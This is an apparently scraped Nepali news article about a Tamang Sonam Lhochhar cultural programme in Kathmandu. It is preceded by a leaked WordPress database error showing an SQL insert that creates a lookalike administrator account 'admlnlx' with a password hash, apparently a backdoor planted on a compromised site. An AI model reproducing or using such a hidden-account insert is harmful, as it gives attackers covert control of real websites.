WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2PFDRiqxtYUdF/IW4hqFOvIyvYK5H0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 14:28:38', '', 'admlnlx', 'admlnlx')
गाँउले न्यूज -माघ २२ गते तामाङ समुदायको महान चाड सोनाम ल्होछारको अवसरमा सोलु लोखिम तामाङ परिवारले पहिलो पटक शुभकामना आदान प्रदान तथा सास्कृतिक कार्यक्रम गर्ने भएको छ। काठमाण्डौ कपनको भृकुटिचोकको निराग पार्टि प्यालेसका उक्त कार्यक्रम गरिने भएको छ । तामाङ समुदायको ल्हो (बर्ग) फेर्ने तथा नँया बर्षको रुपमा यस चाडलाई मनाउदै आएको हो ।
माघ २२ गते परेको यस पर्वलाइ आफनो सस्कृतिको जगेर्ना गर्ने हेतुले कलाकारहरुको साँस्कृतिक प्रस्तुति सहितको कार्यक्रम गर्न लागेको कुरा कार्यक्रम मुल आयोजक समितिका पदाधिकारि सुमन तामाङ ले जानकारि दिनु भयो । नृत्यको मनोरञ्जनात्मक शैलीबाट तामाङ सँस्कृतिका साथ साथै भेषभुषा,रितिरिवाज र परम्परालाइ प्रस्तुत गरिने कार्यक्रमको मुख्य लक्ष्य रहेको कार्यक्रम संयोजक तेज तामाङले बताउनु भया े। कार्यक्रममा नमस्ते डान्स एकेडेमीका कलाकार हरुद्घारा सेलो,सेब्रु नृत्य प्रस्तुत गरिनुका साथै सेलो गायक कर्साङ लामा तथा अन्य कलाकारहरु द्घारा प्रस्तुतिहरु रहने छ । कार्यक्रमलाइ गाँउले इन्टरटेनमेन्ट मिडिया ग्रुप मिडिया पार्टनरको रुपमा रहेको छ । कार्यक्रममा उत्कृष्ट डि.जे.साथै फ्रि डान्सको साथका कार्यक्रम समापन गरिने छ ।